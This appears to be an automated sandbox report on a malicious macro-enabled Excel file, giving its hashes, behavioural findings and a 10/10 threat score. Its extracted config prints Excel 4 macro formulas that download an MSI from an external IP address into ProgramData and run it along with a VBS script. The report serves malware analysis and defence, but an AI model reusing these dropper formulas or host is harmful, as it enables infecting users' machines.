General
-
Target
37b63c24482584a370356b2099ef9842
-
Size
6KB
-
Sample
231222-at8xysfhhq
-
MD5
37b63c24482584a370356b2099ef9842
-
SHA1
cd519de919291b7027044f1134d95f361c76e02b
-
SHA256
dfa04237fd2a1c9b8becb7cb34be76d6f82cf969d02773b0e27cfec53ddb9c4b
-
SHA512
dac02127d9075f86a3ed43c18217e48902ef06c3fad60cdeb7b166004e35eddae8b1dac4515453fc8b5d21c979ddb82f93d4ab3e8a25b4aa8dcc8be63737e74e
-
SSDEEP
192:NDS0uSw1aEOmmfRN8UhHFBFYuLb98yOTKs:N/uxwr1FYmb98yOOs
Static task
static1
Behavioral task
behavioral1
Sample
37b63c24482584a370356b2099ef9842.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
37b63c24482584a370356b2099ef9842.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187
-
formulas
=EXEC("msiexec.exe")
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0)
=EXEC("wscript C:\ProgramData\start.vbs")
=HALT()
Targets
-
-
Target
37b63c24482584a370356b2099ef9842
-
Score
10/10
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-